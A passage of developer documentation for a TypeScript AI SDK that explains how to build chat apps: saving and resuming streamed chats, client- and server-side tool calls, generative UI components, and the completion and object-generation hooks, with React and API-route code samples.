import { convertToModelMessages, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas

export async function POST(req: Request) {
  // get the last message from the client:
  const { message, id } = await req.json();

  // load the previous messages from the server:
  const previousMessages = await loadChat(id);

  // validate messages if they contain tools, metadata, or data parts:
  const validatedMessages = await validateUIMessages({
    // append the new message to the previous messages:
    messages: [...previousMessages, message],
    tools, // if using tools
    metadataSchema, // if using custom metadata
    dataSchemas, // if using custom data parts
  });

  const result = streamText({
    // ...
    messages: convertToModelMessages(validatedMessages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: validatedMessages,
    onFinish: ({ messages }) => {
      saveChat({ chatId: id, messages });
    },
  });
}

Handling client disconnects

By default, the AI SDK streamText function uses backpressure to the language model provider to prevent the consumption of tokens that are not yet requested.

import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';

export async function POST(req: Request) {
  const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
    await req.json();

  const result = streamText({
    model,
    messages: convertToModelMessages(messages),
  });

  // consume the stream to ensure it runs to completion & triggers onFinish
  // even when the client response is aborted:
  result.consumeStream(); // no await

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    onFinish: ({ messages }) => {
      saveChat({ chatId, messages });
    },
  });
}

When the client reloads the page after a disconnect, the chat will be restored from the storage solution.

For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.

title: Chatbot Resume Streams description: Learn how to resume chatbot streams after client disconnects.

Chatbot Resume Streams

useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.

How stream resumption works

Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.

The AI SDK provides:

A resume option in useChat that automatically reconnects to active streams
Access to the outgoing stream through the consumeSseStream callback
Automatic HTTP requests to your resume endpoints

You build:

Storage to track which stream belongs to each chat
Redis to store the UIMessage stream
Two API endpoints: POST to create streams, GET to resume them
Integration with resumable-stream to manage Redis storage

Prerequisites

To implement resumable streams in your chat application, you need:

The resumable-stream package - Handles the publisher/subscriber mechanism for streams
A Redis instance - Stores stream data (e.g. Redis through Vercel)
A persistence layer - Tracks which stream ID is active for each chat (e.g. database)

Implementation

1. Client-side: Enable stream resumption

Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';

export function Chat({
  chatData,
  resume = false,
}: {
  chatData: { id: string; messages: UIMessage[] };
  resume?: boolean;
}) {
  const { messages, sendMessage, status } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume, // Enable automatic stream resumption
    transport: new DefaultChatTransport({
      // You must send the id of the chat
      prepareSendMessagesRequest: ({ id, messages }) => {
        return {
          body: {
            id,
            message: messages[messages.length - 1],
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.

Let's start by creating the POST handler to create the resumable stream.

2. Create the POST handler

The POST handler creates resumable streams using the consumeSseStream callback:

import { openai } from '@ai-sdk/openai';
import { readChat, saveChat } from '@util/chat-store';
import {
  convertToModelMessages,
  generateId,
  streamText,
  type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function POST(req: Request) {
  const {
    message,
    id,
  }: {
    message: UIMessage | undefined;
    id: string;
  } = await req.json();

  const chat = await readChat(id);
  let messages = chat.messages;

  messages = [...messages, message!];

  // Clear any previous active stream and save the user message
  saveChat({ id, messages, activeStreamId: null });

  const result = streamText({
    model: 'openai/gpt-5-mini',
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages,
    generateMessageId: generateId,
    onFinish: ({ messages }) => {
      // Clear the active stream when finished
      saveChat({ id, messages, activeStreamId: null });
    },
    async consumeSseStream({ stream }) {
      const streamId = generateId();

      // Create a resumable stream from the SSE stream
      const streamContext = createResumableStreamContext({ waitUntil: after });
      await streamContext.createNewResumableStream(streamId, () => stream);

      // Update the chat with the active stream ID
      saveChat({ id, activeStreamId: streamId });
    },
  });
}

3. Implement the GET handler

Create a GET handler at /api/chat/[id]/stream that:

Reads the chat ID from the route params
Loads the chat data to check for an active stream
Returns 204 (No Content) if no stream is active
Resumes the existing stream if one is found

import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';

export async function GET(
  _: Request,
  { params }: { params: Promise<{ id: string }> },
) {
  const { id } = await params;

  const chat = await readChat(id);

  if (chat.activeStreamId == null) {
    // no content response when there is no active stream
    return new Response(null, { status: 204 });
  }

  const streamContext = createResumableStreamContext({
    waitUntil: after,
  });

  return new Response(
    await streamContext.resumeExistingStream(chat.activeStreamId),
    { headers: UI_MESSAGE_STREAM_HEADERS },
  );
}

How it works

Request lifecycle

Diagram showing the architecture and lifecycle of resumable stream requests

The diagram above shows the complete lifecycle of a resumable stream:

Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
Stream tracking: Your persistence layer saves the activeStreamId in the chat data
Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null

Customize the resume endpoint

By default, the useChat hook makes a GET request to /api/chat/[id]/stream when resuming. Customize this endpoint, credentials, and headers, using the prepareReconnectToStreamRequest option in DefaultChatTransport:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

export function Chat({ chatData, resume }) {
  const { messages, sendMessage } = useChat({
    id: chatData.id,
    messages: chatData.messages,
    resume,
    transport: new DefaultChatTransport({
      // Customize reconnect settings (optional)
      prepareReconnectToStreamRequest: ({ id }) => {
        return {
          api: `/api/chat/${id}/stream`, // Default pattern
          // Or use a different pattern:
          // api: `/api/streams/${id}/resume`,
          // api: `/api/resume-chat?id=${id}`,
          credentials: 'include', // Include cookies/auth
          headers: {
            Authorization: 'Bearer token',
            'X-Custom-Header': 'value',
          },
        };
      },
    }),
  });

  return <div>{/* Your chat UI */}</div>;
}

This lets you:

Match your existing API route structure
Add query parameters or custom paths
Integrate with different backend architectures

Important considerations

Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
Multiple clients: Multiple clients can connect to the same stream simultaneously
Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
Security: Ensure proper authentication and authorization for both creating and resuming streams
Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams

title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.

Chatbot Tool Usage

With useChat and streamText, you can use tools in your chatbot application. The AI SDK supports three types of tools in this context:

Automatically executed server-side tools
Automatically executed client-side tools
Tools that require user interaction, such as confirmation dialogs

The flow is as follows:

The user enters a message in the chat UI.
The message is sent to the API route.
In your server side route, the language model generates tool calls during the streamText call.
All tool calls are forwarded to the client.
Server-side tools are executed using their execute method and their results are forwarded to the client.
Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
Client-side tool that require user interactions can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.

The tool calls and tool executions are integrated into the assistant message as typed tool parts. A tool part is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.

Example

In this example, we'll use three tools:

getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
getLocation: An automatically executed client-side tool that returns a random city.

API route

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
    tools: {
      // server-side tool with execute function:
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
      // client-side tool that starts user interaction:
      askForConfirmation: {
        description: 'Ask the user for confirmation.',
        inputSchema: z.object({
          message: z.string().describe('The message to ask for confirmation.'),
        }),
      },
      // client-side tool that is automatically executed on the client:
      getLocation: {
        description:
          'Get the user location. Always ask for confirmation before using this tool.',
        inputSchema: z.object({}),
      },
    },
  });

  return result.toUIMessageStreamResponse();
}

Client-side page

The client-side page uses the useChat hook to create a chatbot application with real-time message streaming. Tool calls are displayed in the chat UI as typed tool parts. Please make sure to render the messages using the parts property of the message.

There are three things worth mentioning:

The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
The sendAutomaticallyWhen option with lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getLocation') {
        const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];

        // No await - avoids potential deadlocks
        addToolOutput({
          tool: 'getLocation',
          toolCallId: toolCall.toolCallId,
          output: cities[Math.floor(Math.random() * cities.length)],
        });
      }
    },
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          <strong>{`${message.role}: `}</strong>
          {message.parts.map(part => {
            switch (part.type) {
              // render text parts as simple text:
              case 'text':
                return part.text;

              // for tool parts, use the typed tool part names:
              case 'tool-askForConfirmation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Loading confirmation request...</div>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        {part.input.message}
                        <div>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'Yes, confirmed.',
                              })
                            }
                          >
                            Yes
                          </button>
                          <button
                            onClick={() =>
                              addToolOutput({
                                tool: 'askForConfirmation',
                                toolCallId: callId,
                                output: 'No, denied',
                              })
                            }
                          >
                            No
                          </button>
                        </div>
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Location access allowed: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return <div key={callId}>Error: {part.errorText}</div>;
                }
                break;
              }

              case 'tool-getLocation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  case 'input-streaming':
                    return (
                      <div key={callId}>Preparing location request...</div>
                    );
                  case 'input-available':
                    return <div key={callId}>Getting location...</div>;
                  case 'output-available':
                    return <div key={callId}>Location: {part.output}</div>;
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting location: {part.errorText}
                      </div>
                    );
                }
                break;
              }

              case 'tool-getWeatherInformation': {
                const callId = part.toolCallId;

                switch (part.state) {
                  // example of pre-rendering streaming tool inputs:
                  case 'input-streaming':
                    return (
                      <pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
                    );
                  case 'input-available':
                    return (
                      <div key={callId}>
                        Getting weather information for {part.input.city}...
                      </div>
                    );
                  case 'output-available':
                    return (
                      <div key={callId}>
                        Weather in {part.input.city}: {part.output}
                      </div>
                    );
                  case 'output-error':
                    return (
                      <div key={callId}>
                        Error getting weather for {part.input.city}:{' '}
                        {part.errorText}
                      </div>
                    );
                }
                break;
              }
            }
          })}
          <br />
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </>
  );
}

Error handling

Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of output-error and errorText value instead of output record the error.

'use client';

import { useChat } from '@ai-sdk/react';
import {
  DefaultChatTransport,
  lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, addToolOutput } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),

    sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,

    // run client-side tools that are automatically executed:
    async onToolCall({ toolCall }) {
      // Check if it's a dynamic tool first for proper type narrowing
      if (toolCall.dynamic) {
        return;
      }

      if (toolCall.toolName === 'getWeatherInformation') {
        try {
          const weather = await getWeatherInformation(toolCall.input);

          // No await - avoids potential deadlocks
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            output: weather,
          });
        } catch (err) {
          addToolOutput({
            tool: 'getWeatherInformation',
            toolCallId: toolCall.toolCallId,
            state: 'output-error',
            errorText: 'Unable to get the weather information',
          });
        }
      }
    },
  });
}

Dynamic Tools

When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:

{
  message.parts.map((part, index) => {
    switch (part.type) {
      // Static tools with specific (`tool-${toolName}`) types
      case 'tool-getWeatherInformation':
        return <WeatherDisplay part={part} />;

      // Dynamic tools use generic `dynamic-tool` type
      case 'dynamic-tool':
        return (
          <div key={index}>
            <h4>Tool: {part.toolName}</h4>
            {part.state === 'input-streaming' && (
              <pre>{JSON.stringify(part.input, null, 2)}</pre>
            )}
            {part.state === 'output-available' && (
              <pre>{JSON.stringify(part.output, null, 2)}</pre>
            )}
            {part.state === 'output-error' && (
              <div>Error: {part.errorText}</div>
            )}
          </div>
        );
    }
  });
}

Dynamic tools are useful when integrating with:

MCP (Model Context Protocol) tools without schemas
User-defined functions loaded at runtime
External tool providers

Tool call streaming

Tool call streaming is enabled by default in AI SDK 5.0, allowing you to stream tool calls while they are being generated. This provides a better user experience by showing tool inputs as they are generated in real-time.

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
    // toolCallStreaming is enabled by default in v5
    // ...
  });

  return result.toUIMessageStreamResponse();
}

With tool call streaming enabled, partial tool calls are streamed as part of the data stream. They are available through the useChat hook. The typed tool parts of assistant messages will also contain partial tool calls. You can use the state property of the tool part to render the correct UI.

export default function Chat() {
  // ...
  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.parts.map(part => {
            switch (part.type) {
              case 'tool-askForConfirmation':
              case 'tool-getLocation':
              case 'tool-getWeatherInformation':
                switch (part.state) {
                  case 'input-streaming':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'input-available':
                    return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
                  case 'output-available':
                    return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
                  case 'output-error':
                    return <div>Error: {part.errorText}</div>;
                }
            }
          })}
        </div>
      ))}
    </>
  );
}

Step start parts

When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages. If you want to display boundaries between tool calls, you can use the step-start parts as follows:

// ...
// where you render the message parts:
message.parts.map((part, index) => {
  switch (part.type) {
    case 'step-start':
      // show step boundaries as horizontal lines:
      return index > 0 ? (
        <div key={index} className="text-gray-500">
          <hr className="my-2 border-gray-300" />
        </div>
      ) : null;
    case 'text':
    // ...
    case 'tool-askForConfirmation':
    case 'tool-getLocation':
    case 'tool-getWeatherInformation':
    // ...
  }
});
// ...

Server-side Multi-Step Calls

You can also use multi-step calls on the server-side with streamText. This works when all invoked tools have an execute function on the server side.

import { convertToModelMessages, streamText, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
    tools: {
      getWeatherInformation: {
        description: 'show the weather in a given city to the user',
        inputSchema: z.object({ city: z.string() }),
        // tool has execute function:
        execute: async ({}: { city: string }) => {
          const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
          return weatherOptions[
            Math.floor(Math.random() * weatherOptions.length)
          ];
        },
      },
    },
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse();
}

Errors

Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.

To surface the errors, you can use the onError function when calling toUIMessageResponse.

export function errorHandler(error: unknown) {
  if (error == null) {
    return 'unknown error';
  }

  if (typeof error === 'string') {
    return error;
  }

  if (error instanceof Error) {
    return error.message;
  }

  return JSON.stringify(error);
}

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: errorHandler,
});

In case you are using createUIMessageResponse, you can use the onError function when calling toUIMessageResponse:

const response = createUIMessageResponse({
  // ...
  async execute(dataStream) {
    // ...
  },
  onError: error => `Custom error: ${error.message}`,
});

title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.

Generative User Interfaces

Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:

You provide the model with a prompt or conversation history, along with a set of tools.
Based on the context, the model may decide to call a tool.
If a tool is called, it will execute and return data.
This data can then be passed to a React component for rendering.

By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.

Build a Generative UI Chat Interface

Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.

Basic Chat Implementation

Start with a basic chat implementation using the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }
              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

To handle the chat requests and model responses, set up an API route:

import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse();
}

This API route uses the streamText function to process chat messages and stream the model's responses back to the client.

Create a Tool

Create a new file called ai/tools.ts with the following content:

import { tool as createTool } from 'ai';
import { z } from 'zod';

export const weatherTool = createTool({
  description: 'Display the weather for a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async function ({ location }) {
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { weather: 'Sunny', temperature: 75, location };
  },
});

export const tools = {
  displayWeather: weatherTool,
};

Update the API Route

Update the API route to include the tool you've defined:

import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';

export async function POST(request: Request) {
  const { messages }: { messages: UIMessage[] } = await request.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a friendly assistant!',
    messages: convertToModelMessages(messages),
    stopWhen: stepCountIs(5),
    tools,
  });

  return result.toUIMessageStreamResponse();
}

Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.

Create UI Components

Create a new file called components/weather.tsx:

type WeatherProps = {
  temperature: number;
  weather: string;
  location: string;
};

export const Weather = ({ temperature, weather, location }: WeatherProps) => {
  return (
    <div>
      <h2>Current Weather for {location}</h2>
      <p>Condition: {weather}</p>
      <p>Temperature: {temperature}°C</p>
    </div>
  );
};

This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).

Render the Weather Component

Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.

To check if the model has called a tool, you can check the parts array of the UIMessage object for tool-specific parts. In AI SDK 5.0, tool parts use typed naming: tool-${toolName} instead of generic types.

Update your page.tsx file:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Type a message..."
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

In this updated code snippet, you:

Use manual input state management with useState instead of the built-in input and handleInputChange.
Use sendMessage instead of handleSubmit to send messages.
Check the parts array of each message for different content types.
Handle tool parts with type tool-displayWeather and their different states (input-available, output-available, output-error).

This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.

Expanding Your Generative UI Application

You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:

Adding More Tools

To add more tools, simply define them in your ai/tools.ts file:

// Add a new stock tool
export const stockTool = createTool({
  description: 'Get price for a stock',
  inputSchema: z.object({
    symbol: z.string().describe('The stock symbol to get the price for'),
  }),
  execute: async function ({ symbol }) {
    // Simulated API call
    await new Promise(resolve => setTimeout(resolve, 2000));
    return { symbol, price: 100 };
  },
});

// Update the tools object
export const tools = {
  displayWeather: weatherTool,
  getStockPrice: stockTool,
};

Now, create a new file called components/stock.tsx:

type StockProps = {
  price: number;
  symbol: string;
};

export const Stock = ({ price, symbol }: StockProps) => {
  return (
    <div>
      <h2>Stock Information</h2>
      <p>Symbol: {symbol}</p>
      <p>Price: ${price}</p>
    </div>
  );
};

Finally, update your page.tsx file to include the new Stock component:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>{message.role}</div>
          <div>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return <span key={index}>{part.text}</span>;
              }

              if (part.type === 'tool-displayWeather') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading weather...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Weather {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              if (part.type === 'tool-getStockPrice') {
                switch (part.state) {
                  case 'input-available':
                    return <div key={index}>Loading stock price...</div>;
                  case 'output-available':
                    return (
                      <div key={index}>
                        <Stock {...part.output} />
                      </div>
                    );
                  case 'output-error':
                    return <div key={index}>Error: {part.errorText}</div>;
                  default:
                    return null;
                }
              }

              return null;
            })}
          </div>
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          type="text"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </div>
  );
}

By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.

title: Completion description: Learn how to use the useCompletion hook.

Completion

In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.

Example

'use client';

import { useCompletion } from '@ai-sdk/react';

export default function Page() {
  const { completion, input, handleInputChange, handleSubmit } = useCompletion({
    api: '/api/completion',
  });

  return (
    <form onSubmit={handleSubmit}>
      <input
        name="prompt"
        value={input}
        onChange={handleInputChange}
        id="input"
      />
      <button type="submit">Submit</button>
      <div>{completion}</div>
    </form>
  );
}

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { prompt }: { prompt: string } = await req.json();

  const result = streamText({
    model: __MODEL__,
    prompt,
  });

  return result.toUIMessageStreamResponse();
}

This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.

Loading and error states

To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:

const { isLoading, ... } = useCompletion()

return(
  <>
    {isLoading ? <Spinner /> : null}
  </>
)

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:

const { error, ... } = useCompletion()

useEffect(() => {
  if (error) {
    toast.error(error.message)
  }
}, [error])

// Or display the error message in the UI:
return (
  <>
    {error ? <div>{error.message}</div> : null}
  </>
)

Controlled input

The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:

const { input, setInput } = useCompletion();

return (
  <>
    <MyCustomInput value={input} onChange={value => setInput(value)} />
  </>
);

Cancelation

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.

const { stop, isLoading, ... } = useCompletion()

return (
  <>
    <button onClick={stop} disabled={!isLoading}>Stop</button>
  </>
)

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.

Throttling UI Updates

This feature is currently only available for React.

By default, the useCompletion hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { completion, ... } = useCompletion({
  // Throttle the completion and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

const { ... } = useCompletion({
  onResponse: (response: Response) => {
    console.log('Received response from server:', response)
  },
  onFinish: (prompt: string, completion: string) => {
    console.log('Finished streaming completion:', completion)
  },
  onError: (error: Error) => {
    console.error('An error occurred:', error)
  },
})

Configure Request Options

const { messages, input, handleInputChange, handleSubmit } = useCompletion({
  api: '/api/custom-completion',
  headers: {
    Authorization: 'your_token',
  },
  body: {
    user_id: '123',
  },
  credentials: 'same-origin',
});

title: Object Generation description: Learn how to use the useObject hook.

Object Generation

The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.

In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.

Example

The example shows a small notifications demo app that generates fake notifications in real-time.

Schema

It is helpful to set up the schema in a separate file that is imported on both the client and server.

import { z } from 'zod';

// define a schema for the notifications
export const notificationSchema = z.object({
  notifications: z.array(
    z.object({
      name: z.string().describe('Name of a fictional person.'),
      message: z.string().describe('Message. Do not use emojis or links.'),
    }),
  ),
});

Client

The client uses useObject to stream the object generation process.

The results are partial and are displayed as they are received. Please note the code for handling undefined values in the JSX.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Server

On the server, we use streamObject to stream the object generation process.

import { streamObject } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamObject({
    model: __MODEL__,
    schema: notificationSchema,
    prompt:
      `Generate 3 notifications for a messages app in this context:` + context,
  });

  return result.toTextStreamResponse();
}

Enum Output Mode

When you need to classify or categorize input into predefined options, you can use the enum output mode with useObject. This requires a specific schema structure where the object has enum as a key with z.enum containing your possible values.

Example: Text Classification

This example shows how to build a simple text classifier that categorizes statements as true or false.

Client

When using useObject with enum output mode, your schema must be an object with enum as the key:

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';

